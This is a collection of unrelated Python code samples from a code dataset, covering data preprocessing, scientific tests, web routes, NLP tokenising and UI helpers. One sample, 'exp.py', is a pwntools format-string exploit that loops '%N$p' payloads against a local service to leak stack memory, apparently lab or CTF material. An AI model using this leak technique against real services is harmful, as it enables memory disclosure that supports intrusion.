9: "Septembre", 10: "Octobre", 11: "Novembre", 12: "Decembre"}
df["jour"] = df.index.weekday
df["jour"] = df["jour"].apply(lambda x: dic_jour[x])
df["semaine"] = df.index.week
df["mois"] = df.index.month
df["mois"] = df["mois"].apply(lambda x: dic_mois[x])
df["annee_scolaire"] = df.index.to_series().map(get_annee_scolaire)
date_repas_noel = ["2012-12-20", "2013-12-19", "2014-12-18", "2015-12-17", "2016-12-15",
"2017-12-21", "2018-12-20"]
l_noel = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in date_repas_noel]
df_noel = pd.DataFrame(l_noel, columns=["date"])
df_noel["repas_noel"] = 1
df = df.join(df_noel.set_index("date"))
df["repas_noel"] = df["repas_noel"].fillna(0)
####################################
# Ajout du gaspillage
####################################
assert df.isnull().sum().sum() == 0
df["gaspillage_volume"] = df["prevision"] - df["reel"]
df["gaspillage_pourcentage"] = 100 * (df["prevision"] - df["reel"]) / df["prevision"]
####################################
# Ajout des variables liées au menu
####################################
nlp = spacy.load("fr_core_news_sm")
corpus = df['menu'].apply(lambda x: "".join([i + " " for i in x]))
corpus = corpus.dropna()
# stop_word
liste = ['04', '10', '17', '18225', '2015', '2016', '220gr', '268', '29', '500', '500g', '5kg', '850''500', '500g',
'5kg', '850', 'ab', 'an', 'au', 'aux', 'avec', 'baut', 'bbc', 'de', 'des', 'du', 'en', 'et', 'gr', 'kg',
'la', 'le', 'les', 'ou', 'par', 's17', 'sa', 'sans', 'ses', 'son']
# Create CountVectorizer object
vectorizer = CountVectorizer(strip_accents='ascii', stop_words=liste, lowercase=True, ngram_range=(1, 1))
# Generate matrix of word vectors
bow_matrix = vectorizer.fit_transform(corpus)
# Convert bow_matrix into a DataFrame
bow_df = pd.DataFrame(bow_matrix.toarray())
# Map the column names to vocabulary
bow_df.columns = vectorizer.get_feature_names()
bow_df.index = df.index
# feature porc
l_porc = ["carbonara", "carbonata", "cassoulet", "chipo", "chipolatas", "choucroute",
"cordon", "croziflette", "francfort", "jambon", "knacks", "lardons", "porc", "rosette",
"saucisse", "saucisses", "tartiflette"]
df["porc"] = sum([bow_df[alim] for alim in l_porc])
df['porc'] = df['porc'] > 0
df['porc'] = df['porc'].astype('int')
# feature viande
l_viande = ["roti", "agneau", "blanquette", "boeuf", "boudin", "boulettes",
"bourguignon", "bourguignonne", "canard", "carne", "chapon", "colombo",
"couscous", "dinde", "escalope", "farci", "foie", "kebab", "lapin", "merguez",
"mouton", "napolitaines", "nuggets", "paupiette", "pintade",
"poulet", "steak", "stogonoff", "strogonoff", "tagine", "tajine",
"veau", "viande", "volaile", "volaille", "carbonara", "carbonata", "cassoulet", "chipo", "chipolatas",
"choucroute", "cordon", "croziflette", "francfort", "jambon", "knacks", "lardons", "porc", "rosette",
"saucisse", "saucisses", "tartiflette", "parmentier"]
df["viande"] = sum([bow_df[alim] for alim in l_viande])
df['viande'] = df['viande'] > 0
df['viande'] = df['viande'].astype('int')
df = df.reset_index().rename(columns = {"index":"date"})
l_index = ["2018-01-22", "2017-10-09", "2017-05-09", "2016-10-18", "2016-04-25", "2015-05-26", "2014-11-24",
"2014-05-26", "2014-03-31", "2014-01-20", "2012-01-16", "2012-01-30", "2012-07-02", "2012-10-01",
"2011-01-17", "2011-01-31", "2011-09-13", "2015-06-22", "2015-01-19", "2014-06-30", "2012-06-18",
"2011-06-20"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 1
# traitement particulier des lasagnes napolitaines pour éviter les confusions avec les lasagnes de poisson
l_index = ["2016-02-22", "2016-02-04", "2015-11-23", "2015-11-17", "2015-10-05",
"2015-05-04", "2015-01-26", "2014-12-15", "2013-09-23", "2012-10-09", "2012-05-21", "2012-02-27",
"2011-11-03", "2011-09-05", "2011-05-09", "2012-12-10", "2013-12-02", "2014-05-12", "2016-05-09"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 1
# traitement particulier de certains termes qui peuvent être utilisés pour du poisson ou de la viande sautés, chili, pot au feu, bolognaise, courgette farcie,ravioli
l_index = ["2016-01-28", "2016-03-17", "2016-03-07", "2015-09-15", "2012-12-06", "2012-05-03", "2012-02-09",
"2011-11-03",
"2011-09-13", "2011-06-07", "2011-04-04", "2014-06-12", "2012-11-12", "2015-06-22"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 1
# traitement particulier pour parmentier végétale, steack de soja
l_index = ["2019-11-25", "2014-06-20"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 0
# feature poisson
l_poisson = ["poissons", "sardines", "perray", "thon", "calamar", "lieu", "colin", "crabe", "crevette", "crustace",
"dorade", "maquereau", "poisson", "rillette", "sardine", "saumon"]
df["poisson"] = sum([bow_df[alim] for alim in l_poisson])
df['poisson'] = df['poisson'] > 0
df['poisson'] = df['poisson'].astype('int')
df['poisson'][(df['viande'] == 1) & (df['poisson'] == 1)] = np.zeros(
len(df['poisson'][(df['viande'] == 1) & (df['poisson'] == 1)]))
# traitement particulier parmentier poisson #nuggets de poisson,steack de soja et sale au thon, carbo de saumon
l_index = ["2019-05-17", "2019-05-17", "2019-02-01", "2018-11-23", "2018-10-19", "2018-09-14", "2018-06-05",
"2018-03-27", "2018-01-16", "2017-12-01", "2017-09-22", "2017-05-05", "2016-05-03", "2016-02-26",
"2016-01-15", "2015-11-20", "2015-09-22", "2015-09-08", "2015-06-05", "2014-09-08", "2014-03-25",
"2014-02-18", "2014-01-24", "2013-12-10", "2013-11-29", "2013-10-01", "2012-12-14", "2012-10-19",
"2012-09-21", "2012-03-16", "2012-01-20", "2011-09-09", "2011-03-18", "2019-03-08"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "viande"] = 0
df.loc[df[df["date"] == i].index, "poisson"] = 1
# traitement particulier paella de la mer, filet
l_index = ['2011-01-10', '2012-01-09', '2011-01-07', "2012-01-06"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "poisson"] = 1
# 2 menus : végé et viande, on considère que c'est un menu végé
l_index = ["2015-11-13", "2015-09-11"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "poisson"] = 0
df.loc[df[df["date"] == i].index, "viande"] = 0
# 2 menus : poisson et viande, on considère que c'est un menu poisson
l_index = ["2015-11-20", "2015-10-16", "2015-10-02", "2015-09-25", "2015-09-18", "2015-09-04", "2015-06-25",
"2015-06-11"]
index = [datetime.datetime.strptime(x, '%Y-%m-%d') for x in l_index]
for i in index:
df.loc[df[df["date"] == i].index, "poisson"] = 1
df.loc[df[df["date"] == i].index, "viande"] = 0
# menu inconnu, mais probablement avec viande d'après le modèle
df.loc[df[df["date"] == datetime.datetime.strptime("2015-10-15", "%Y-%m-%d")].index, "viande"] = 1
# feature bio
df['bio'] = bow_df["bio"]
# set date as index
df = df.set_index("date")
###############################################################
# Ajout des 4 premiers et 4 derniers jours de l'année scolaire (grosse incertitude)
#############################################################
ind = []
temp = []
subset = df.copy()
#print("subset", subset["annee_scolaire"].unique()[1:])
for i in range(1, 5):
for annee in subset["annee_scolaire"].unique()[1:]:
temp.append(min(subset[(subset.index.year == min(subset[subset["annee_scolaire"] == annee].index.year)) & (
subset["annee_scolaire"] == annee)].index))
df.loc[temp, "4_premiers_jours"] = 1
ind.append(temp)
subset.drop(temp, inplace=True)
temp = []
for i in range(1, 5):
for annee in subset["annee_scolaire"].unique()[:-1]:
temp.append(max(subset[(subset.index.year == max(subset[subset["annee_scolaire"] == annee].index.year)) & (
subset["annee_scolaire"] == annee)].index))
df.loc[temp, "4_derniers_jours"] = 1
ind.append(temp)
subset.drop(temp, inplace=True)
temp = []
df["4_derniers_jours"].fillna(0, inplace=True)
df["4_premiers_jours"].fillna(0, inplace=True)
####################################
# Tests (longueur et valeurs manquantes)
####################################
assert len(df) == 1188
df.to_pickle("data_processed/global.pk")
df.to_excel("data_processed/global.xlsx")
| StarcoderdataPython |
61551 | <reponame>tboser/nodevectors
from nodevectors.evaluation.graph_eval import *
from nodevectors.evaluation.link_pred import *
| StarcoderdataPython |
4804644 | import pickle
from .monitor import *
from .context import text_model_filename
from .textset import *
from .utils.text_encoders import *
from .spaces.process import space_textset_bow, space_textset_w2v, space_textset_d2v
log = logging.getLogger(__name__)
def get_textset_w2v(textset_id, model, size):
"""
get the model trained on textset with the size
:param textset_id: id of the textset
:param model: model (w2v / d2v)
:param size: dimension (100 or 200)
:return: model
"""
if model not in ['w2v', 'd2v']:
raise ValueError('model must be w2v or d2v')
if size not in [100, 200]:
raise ValueError('size must be 100 or 200')
textset = get_textset(textset_id)
#if textset.status != 'created':
# raise ValueError('textset status must be created')
return pickle.load(open(get_data_folder() + '/texts/w2v_%d_%d.pkl' % (textset_id, size), 'rb'))
def worker_text_loop():
"""
periodically pool the receiver queue for a search job
:return:
"""
while True:
heart_beep('worker_text', '')
# check the list of datasets
for ts in get_textset_list():
if ts.status != 'completed':
heart_beep('worker_text', {'textset_id': ts.textset_id, 'textset_name': ts.name})
log.info('searching textset %s' % ts.textset_id)
# read textset
textset = get_textset(ts.textset_id)
set_key_store('textset:%s:status' % ts.textset_id, 'searching')
# import text
with open(textset.filename, 'r') as f:
text = f.readlines()
# calculate models
for conf in space_textset_bow:
pickle.dump(model_bow(text, conf), open(text_model_filename(ts.textset_id, 'bow', conf), 'wb'))
for conf in space_textset_w2v:
pickle.dump(model_word2vec(text, conf), open(text_model_filename(ts.textset_id, 'w2v', conf), 'wb'))
for conf in space_textset_d2v:
pickle.dump(model_doc2vec(text, conf), open(text_model_filename(ts.textset_id, 'd2v', conf), 'wb'))
# update status to completed
set_key_store('textset:%s:status' % ts.textset_id, 'completed')
| StarcoderdataPython |
3298748 | import pytest
from time import sleep
from utilities import XLUtility
from pageObjects.common_functions.common_methods import CommonMethods
@pytest.mark.usefixtures("one_time_setup")
class Test_TC208_103_MobileCreateAccount:
@pytest.fixture(autouse=True)
def class_setup(self, one_time_setup):
self.driver.set_window_size(411, 823)
def test_mobile_create_account(self):
common = CommonMethods(self.driver)
# get all the required data
client_portal_url = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 2)
first_name = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 3)
last_name = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 4)
birth_date = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 5)
phone_no = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 6)
email_id = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 7)
passwd = XLUtility.readData(self.path_1, 'client_portal_mobile_data', 6, 8)
client_name = first_name + " " + last_name
self.driver.get(client_portal_url)
self.client_portal_page_obj.clk_mobile_menu()
self.client_portal_page_obj.clk_create_account()
common.create_client_portal_user(first_name, last_name, birth_date, phone_no, email_id, passwd)
sign_in_message = self.client_portal_page_obj.capture_sign_in_message()
exp_sign_in_message = "Success! You have created your account."
sleep(1)
# delete the new account created
self.logIn()
self.login_page_obj.clk_navigation_btn()
self.login_page_obj.clk_mobile_client_prospects()
self.client_page_obj.mobile_sel_prospect_name(client_name)
self.client_page_obj.clk_delete_user()
if sign_in_message == exp_sign_in_message:
self.log.info("{} passed!".format(__name__))
assert True
else:
self.log.info("{} failed!".format(__name__))
assert False
| StarcoderdataPython |
1611868 | <filename>Examples/stack/exp.py
from pwn import *
context.log_level = 'error'
def leak(payload):
sh = remote('127.0.0.1', 9999)
sh.sendline(payload)
data = sh.recvuntil('\n', drop=True)
if data.startswith('0x'):
print p64(int(data, 16))
sh.close()
i = 1
while 1:
payload = '%{}$p'.format(i)
leak(payload)
i += 1
| StarcoderdataPython |
65172 | <gh_stars>1-10
from math import pi
import pytest
import numpy as np
import lammps
def test_lattice_const_to_lammps_box_cubic():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (0, 0, 0)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
def test_lattice_const_to_lammps_box_cubic_offset_origin():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (4, 3, 2)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
def test_lattice_to_lammps_box_cubic_transform():
lengths = (5, 5, 5)
angles = (pi/2, pi/2, pi/2)
origin = (4, 3, 2)
a, b, c = lengths
xlo, ylo, zlo = origin
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
assert np.all(np.isclose(bounds, [[xlo, xlo+a], [ylo, ylo+b], [zlo, zlo+c]]))
assert np.all(np.isclose(tilts, (0, 0, 0)))
assert np.all(np.isclose(rotation_matrix, np.eye(3)))
points = np.random.random((10, 3))
points_new_1 = lammps.core.transform_cartesian_vector_to_lammps_vector(points, rotation_matrix)
assert np.all(np.isclose(points, points_new_1))
points_new_2 = lammps.core.transform_cartesian_vector_to_lammps_vector(points, rotation_matrix, origin)
assert np.all(np.isclose(points + origin, points_new_2))
def test_lattice_const_to_lammps_box_rhomb():
# 3C-SiC
lengths = (3.0968, 3.0968, 3.0968)
angles = (pi/3, pi/3, pi/3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles)
assert np.all(np.isclose(bounds, ((0, 3.0968), (0, 2.6819074704396493), (0, 2.528526611816982)), atol=1e-3))
assert np.all(np.isclose(tilts, (1.5484000000000004, 1.5484000000000004, 0.8939691568132165)))
def test_lammps_box_to_lattice_const_cubic():
bounds = [[0, 5], [0, 5], [0, 5]]
tilts = (0, 0, 0)
origin = (0, 0, 0)
lengths, angles, origin = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, (5, 5, 5)))
assert np.all(np.isclose(angles, (pi/2, pi/2, pi/2)))
def test_lammps_box_orthogonal_reversible():
lengths = (4, 4, 4)
angles = (pi/2, pi/2, pi/2)
origin = (1, 2, 3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
lengths_r, angles_r, origin_r = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, lengths_r))
assert np.all(np.isclose(angles, angles_r))
assert np.all(np.isclose(origin, origin_r))
def test_lammps_box_tetrahedral_reversible():
# LiTaO3
lengths = (5.5338, 5.5338, 5.5338)
angles = (56.14486291 * pi/180, 56.14486291 * pi/180, 56.14486291 * pi/180)
origin = (1, 2, 3)
bounds, tilts, rotation_matrix = lammps.core.lattice_const_to_lammps_box(lengths, angles, origin=origin)
lengths_r, angles_r, origin_r = lammps.core.lammps_box_to_lattice_const(bounds, tilts)
assert np.all(np.isclose(lengths, lengths_r))
assert np.all(np.isclose(angles, angles_r))
assert np.all(np.isclose(origin, origin_r))
def test_lammps_initial_box(lmp):
assert lmp.box.dimension == 3
assert np.all(np.isclose(lmp.box.lengths, (1., 1., 1.)))
assert np.all(np.isclose(lmp.box.angles, (pi/2., pi/2., pi/2.)))
assert np.all(np.isclose(lmp.box.bounds, [[-0.5, 0.5], [-0.5, 0.5], [-0.5, 0.5]]))
assert np.all(np.isclose(lmp.box.tilts, [0, 0, 0]))
assert np.all(np.isclose(lmp.box.lengths_angles, [[1, 1, 1], [pi/2, pi/2, pi/2]]))
# lammps has some seriously weird initial behavior
# has unit cell 1x1x1 with volume 0 ???
# actually has non-deterministic behavior 0 or inf
# assert np.isclose(lmp.box.volume, 0.)
def test_lammps_set_box_from_lattice_const(lmp):
atom_types = 5
lengths = (10, 10, 10)
angles = (pi/2., pi/2., pi/2.)
lmp.box.from_lattice_const(atom_types, lengths, angles)
assert np.all(np.isclose(lmp.box.lengths, lengths))
assert np.all(np.isclose(lmp.box.angles, angles))
assert lmp.system.total == 0
assert len(lmp.system.atom_types) == atom_types
assert np.isclose(lmp.box.volume, 10**3)
def test_lammps_update_lattice_const(lmp):
lengths = (10, 10, 10)
angles = (pi/2., pi/2., pi/2.)
lmp.box.update_lattice_const(lengths, angles)
assert np.all(np.isclose(lmp.box.lengths, lengths))
assert np.all(np.isclose(lmp.box.angles, angles))
assert np.isclose(lmp.box.volume, 10**3)
| StarcoderdataPython |
33188 | <filename>data/external/repositories/113677/KaggleBillionWordImputation-master/scripts/util.py<gh_stars>0
import sys, bisect
from collections import defaultdict
from itertools import islice, izip
import numpy as np
from scipy.misc import logsumexp
from scipy.spatial import distance
import Levenshtein
PUNCTUATION = set(("'", '"', ',', '.', '!', '?', ';', ':', '-', '--', '(', ')',
'/', '_', '\\', '+', '<', '>', '|', '@', '#', '$', '%', '^',
'&', '*', '[', ']', '{', '}'))
POS_TAGS = set(('UH','WP$','PDT','RBS','LS','EX','WP','$','SYM','RP','CC','RBR','VBG','NNS','CD','PRP$','MD','DT','NNPS','VBD','IN','JJS','WRB','VBN','JJR','WDT','POS','TO','NNP','JJ','RB','VB','FW','PRP','VBZ','NN','VBP'))
UNKNOWN = '<unknown>'
def is_punctuation(word):
return (word in PUNCTUATION)
def is_number(word):
try:
x = float(word)
return True
except:
return False
def is_pos_tag(word):
return (word in POS_TAGS)
def window(seq, n=2):
"Returns a sliding window (of width n) over data from the iterable"
" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... "
it = iter(seq)
result = tuple(islice(it, n))
if len(result) == n:
yield result
for elem in it:
result = result[1:] + (elem,)
yield result
def tokenize_words(line, delim=' '):
return line.rstrip().split(delim)
def pos_tag(word):
return word.rsplit('_', 1)[-1]
def ngram_frequencies(istream, n=1):
counts = defaultdict(int)
for i, line in enumerate(istream):
if i % 100000 == 0:
print >>sys.stderr, i
words = tokenize_words(line)
for ngram in window(words, n):
counts[ngram] += 1
return counts
def words2ids(words, idmap):
ids = []
for word in words:
if word not in idmap:
idmap[word] = len(idmap)
ids.append(idmap[word])
return ids
def ngram_frequencies2(istream, n=1):
unigrams = dict()
counts = defaultdict(int)
for i, line in enumerate(istream):
if i % 100000 == 0:
print >>sys.stderr, "Line %d (%d 1-grams, %d %d-grams)" \
% (i, len(unigrams), len(counts), n)
words = tokenize_words(line)
ids = words2ids(words, unigrams)
for ngram in window(ids, n):
counts[ngram] += 1
id2word = {v: k for k, v in unigrams.iteritems()}
del unigrams
return counts, id2word
def load_vocab(vocab_file):
vocab = {}
for line in vocab_file:
word, freq = line.strip().split('\t')
freq = int(freq)
vocab[word] = freq
return vocab
def prune_vocab(vocab, n):
nwords = sum(v for v in vocab.itervalues())
nvocab = len(vocab)
print >>sys.stderr, "Input has nwords = %s, vocab size = %d" \
% (nwords, nvocab)
vocab = [(v,k) for k,v in vocab.iteritems()]
vocab = list(reversed(sorted(vocab)))
vocab = vocab[:n]
vocab = {k: v for v, k in vocab}
nremaining = sum(v for v in vocab.itervalues())
percent_kept = float(len(vocab)) / nvocab
percent_mass = float(nremaining) / nwords
print >>sys.stderr, "Keeping %d words (%.2f%% of vocab, %.2f%% of mass)" \
% (len(vocab), 100*percent_kept, 100*percent_mass)
return vocab
def score(golden, predicted):
total_d = 0.0
n = 0
for ref, pred in izip(golden, predicted):
total_d += Levenshtein.distance(ref, pred)
n += 1
return total_d / n
def estimate_probabilities(ngrams):
# no smoothing; if we didn't see it in train, best not insert
ntotal = float(sum(ngrams.itervalues()))
print "%d total syntactic ngrams" % ntotal
p = {k: np.log10(v/ntotal) for k, v in ngrams.iteritems()}
print "Total probability = %f" % sum(10.**v for v in p.itervalues())
return p
normalize_ngrams = estimate_probabilities
class Word2Vec(object):
def __init__(self, words, V):
self.words = words
self.word_to_id = {w: i for i, w in enumerate(self.words)}
self.V = V
@classmethod
def load(cls, istream):
# first line indicates # words and dimension of vectors
header = istream.readline().rstrip().split()
nwords = int(header[0])
d = int(header[1])
print >>sys.stderr, "Allocating %dx%d word vector matrix" \
% (nwords, d)
words = []
V = np.zeros((nwords,d), dtype=np.float32)
# subsequent lines have word and vector
print >>sys.stderr, "Loading word vectors"
for i, line in enumerate(istream):
entry = line.rstrip().split()
word = entry[0]
words.append(word)
V[i] = map(float, entry[1:])
if i % 500000 == 0: print >>sys.stderr, i
return cls(words, V)
def get(self, word):
'''get vector for word'''
if word not in self.word_to_id:
raise ValueError("Word2Vec does not contain '%s'" % word)
id = self.word_to_id[word]
return self.V[id]
def nearest(self, word, indices=None):
'''yield words in ascending order of distance to @word'''
# compute distance from word to all other words
# too much memory to precompute all of these ahead of time
# and vector dimension is too large for a KD-tree to be much help
word_vec = np.array(self.get(word), ndmin=2)
V = self.V if indices is None else self.V[indices]
d = distance.cdist(word_vec, V)[0]
for i in np.argsort(d):
w = self.words[i]
# element 0 is this word (d=0) if this word is in indices
# but not this word if this word is not in indices
if w == word: continue
yield w
class Prediction(object):
keep_top_n = 5
def __init__(self, word, locations, Z, Z_location, *args):
self.word = word
self.locations = locations
self.Z = Z
self.Z_location = Z_location
self.p_anywhere = args[:self.keep_top_n]
self.p_at_location = args[self.keep_top_n:2*self.keep_top_n]
self.p_at_other_location = args[2*self.keep_top_n:3*self.keep_top_n]
self.p_surrounding = args[3*self.keep_top_n:]
#assert self.p_anywhere[0] == self.p_at_location[0]
#assert self.p_at_location[0] != self.p_at_other_location[0]
@property
def location(self):
return self.locations[0]
@property
def order(self):
return len(self.p_surrounding)
@property
def location_posterior(self):
return 10.**(self.Z_location - self.Z)
@property
def word_posterior(self):
return 10.**(self.p_at_location[0] - self.Z)
@property
def location_ratio(self):
return self.p_at_location[0] - self.p_at_other_location[0]
@property
def word_ratio(self):
return self.p_at_location[0] - self.p_at_location[1]
@classmethod
def parse(cls, line):
entry = line.rstrip().split('\t')
word = entry[0]
# locations
loc = map(int, entry[1:cls.keep_top_n])
# probabilities
for i in xrange(cls.keep_top_n+1, len(entry)):
entry[i] = float(entry[i])
return cls(word, loc, *entry[cls.keep_top_n+1:])
class TopK(object):
'''Keep track the top-k objects'''
def __init__(self, n):
self.things = [None] * n
self.values = [float('inf')] * n
def add(self, thing, value):
i = bisect.bisect(self.values, -value)
if i < len(self.values):
self.values[i] = -value
self.things[i] = thing
def update(self, other):
for thing, value in other:
self.add(thing, -value)
def __iter__(self):
return izip(self.things, self.values) | StarcoderdataPython |
1734557 | <filename>oteapi_optimade/models/strategies/parse.py
"""Models specific to the parse strategy."""
# pylint: disable=no-self-use
from typing import Any, Dict, Literal, Optional
from optimade.models import Response
from oteapi.models import ResourceConfig, SessionUpdate
from pydantic import Field
from oteapi_optimade.models.config import OPTIMADEConfig
from oteapi_optimade.models.custom_types import OPTIMADEUrl
class OPTIMADEParseConfig(ResourceConfig):
"""OPTIMADE-specific parse strategy config."""
downloadUrl: OPTIMADEUrl = Field(
...,
description="Either a base OPTIMADE URL or a full OPTIMADE URL.",
)
mediaType: Literal[
"application/vnd.optimade+json",
"application/vnd.OPTIMADE+json",
"application/vnd.OPTiMaDe+json",
"application/vnd.optimade+JSON",
"application/vnd.OPTIMADE+JSON",
"application/vnd.OPTiMaDe+JSON",
"application/vnd.optimade",
"application/vnd.OPTIMADE",
"application/vnd.OPTiMaDe",
] = Field(
...,
description="The registered strategy name for OPTIMADEParseStrategy.",
)
configuration: OPTIMADEConfig = Field(
OPTIMADEConfig(),
description=(
"OPTIMADE configuration. Contains relevant information necessary to "
"perform OPTIMADE queries."
),
)
class OPTIMADEParseSession(SessionUpdate):
"""OPTIMADE session for the parse strategy."""
optimade_config: Optional[OPTIMADEConfig] = Field(
None,
description=(
"OPTIMADE configuration. Contains relevant information necessary to "
"perform OPTIMADE queries."
),
)
optimade_response_object: Optional[Response] = Field(
None,
description="An OPTIMADE Python tools (OPT) pydantic response object.",
)
optimade_response: Optional[Dict[str, Any]] = Field(
None,
description="An OPTIMADE response as a Python dictionary.",
)
class Config:
"""Pydantic configuration for `OPTIMADEParseSession`."""
validate_assignment = True
arbitrary_types_allowed = True
| StarcoderdataPython |
3378278 | <gh_stars>0
def swap(arr, i, j):
temp = arr[i]
arr[i] = arr[j]
arr[j] = temp
def bubblesort(arr):
flag = 1
while flag == 1:
flag = 0
for i in range(len(arr)-1):
if arr[i+1] < arr[i]:
swap(arr, i, i+1)
flag = 1
if __name__ == "__main__":
arr = [12, 11, 13, 5, 6, 7]
print(f"Given array is: {arr}", end="\n")
bubblesort(arr)
print(f"Sorted array is: {arr}", end="\n")
| StarcoderdataPython |
1688235 | #! /usr/bin/env python3
import sys
import json
from app import app
from flask import render_template, request
@app.route('/')
@app.route('/index')
def index():
return render_template("index.html", title='Home', app=app)
@app.route('/login')
def login():
return render_template("login.html", title='Login', app=app)
@app.route('/register')
def register():
return render_template("register.html", title='Register', app=app)
@app.route('/about')
def about():
return render_template("about.html", title='About', app=app)
@app.route('/work')
def products():
return render_template("work.html", title='Work', app=app)
@app.route('/events')
def store():
return render_template("events.html", title='Events', app=app)
@app.route('/socialmedia')
def socialMedia():
return render_template("socialmedia.html", title='Social Media', app=app)
@app.route('/subscribe')
def subscribe():
return render_template("subscribe.html", title='Subscribe', app=app)
@app.route('/directory')
def directory():
return render_template("directory.html", title='Directory', app=app)
@app.route('/manage-users')
def manageUsers():
return render_template("manageUsers.html", title="Manage Users", app=app)
@app.route('/profile')
def profile():
user = request.args.get('user', '')
edit = request.args.get('edit', '')
if (user):
return render_template("profile.html", title='Profile', app=app, user=user)
elif (edit == "true"):
return render_template("profile.html", title='Profile', app=app, editmode=True)
else:
return render_template("profile.html", title='Profile', app=app)
@app.route('/account-settings')
def accountSetting():
return render_template("accountSettings.html", title='Account Settings', app=app)
@app.route('/messages')
def messages():
return render_template("messages.html", title='Messages', app=app)
@app.route('/messenger')
def messenger():
sid = request.args.get('sid', '')
if (sid):
return render_template("messenger.html", title='Messenger', app=app, sid=sid)
else:
return render_template("messenger.html", title='Messenger', app=app)
@app.route('/reset')
def reset():
return render_template("reset.html", title='Reset', app=app) | StarcoderdataPython |
3304915 | # -*- coding: utf-8 -*-
import bz2
import sys
import MeCab
from rdflib import Graph
tagger = MeCab.Tagger('')
tagger.parse('') # mecab-python3の不具合に対応 https://github.com/SamuraiT/mecab-python3/issues/3
def read_ttl(f):
"""Turtle形式のファイルからデータを読み出す"""
while True:
# 高速化のため100KBずつまとめて処理する
lines = [line.decode("utf-8").rstrip() for line in f.readlines(102400)]
if not lines:
break
for triple in parse_lines(lines):
yield triple
def parse_lines(lines):
"""Turtle形式のデータを解析して返す"""
g = Graph()
g.parse(data='\n'.join(lines), format='n3')
return g
def tokenize(text):
"""MeCabを用いて単語を分割して返す"""
node = tagger.parseToNode(text)
while node:
if node.stat not in (2, 3): # 文頭と文末を表すトークンは無視する
yield node.surface
node = node.next
with bz2.BZ2File(sys.argv[1]) as in_file:
for (_, p, o) in read_ttl(in_file):
if p.toPython() == 'http://persistence.uni-leipzig.org/nlp2rdf/ontologies/nif-core#isString':
for line in o.toPython().split('\n'):
words = list(tokenize(line))
if len(words) > 20: # 20単語以下の行は無視する
print(' '.join(words))
| StarcoderdataPython |
1740857 | <gh_stars>0
from PyQt4 import QtGui
class BaseDialogMixIn(QtGui.QDialog, object):
'''
Base dialog mixin
'''
def showDialog(self):
'''
Show the dialog.
:return:
'''
self.setupUi(self)
self.retranslateUi(self)
self.show()
self.exec_()
| StarcoderdataPython |
108722 | from django.urls import path
import core.views
app_name = 'core'
urlpatterns = [
path('', core.views.IndexView.as_view(), name='home'),
path('catalog/', core.views.ProductList.as_view(), name='catalog'),
path('catalog/category/<int:category_id>/', core.views.ProductList.as_view(), name='category'),
path('catalog/create', core.views.ProductCreate.as_view(), name='product_create'),
path('catalog/product/<int:pk>/delete/', core.views.ProductDelete.as_view(), name='product_delete'),
path('catalog/product/<int:pk>/update/', core.views.ProductUpdate.as_view(), name='product_update'),
path('catalog/product/<int:pk>/', core.views.ProductDetail.as_view(), name='products'),
path('catalog/product/add_review/<int:pk>/', core.views.Review.as_view(), name='review'),
path('pharmacy/', core.views.PharmacyList.as_view(), name='pharmacy'),
path('pharmacy/<int:pharmacy_id>/', core.views.ProductInPharmacy.as_view(), name='product_in_pharmacy'),
]
| StarcoderdataPython |
1616350 | <filename>classify.py<gh_stars>0
import spacy
import pandas as pd
import numpy as np
import math
# import random
from collections import Counter, defaultdict
import sys
import re
import os
import dataManagment as dm
nlp = spacy.load('en')
import spacy.parts_of_speech as pos_t
VERB = 'VERB'
nsubj = 'nsubj'
dobj = 'dobj'
NN = 'NOUN'
NNS = 'NNS'
ADJ = 'ADJ'
sessions = set()
# this should be replaced with a entity recognition
directions = ["up", "down", "side", "left", "right", "in", "out", "forward", "backward", "north", "south", "east", "west"]
def isDirection(text):
if text in directions:
return True
else:
return False
class Ideas(object):
def __init__(self, doc_):
self.ideas = []
# start with verbs
for word in doc_:
if word.pos_ == VERB:
self.ideas.append(Idea(word))
for idea in self.ideas:
idea.removeBlockWords()
idea.sortTokensToArray()
def __str__(self):
my_string = ""
for idea in self.ideas:
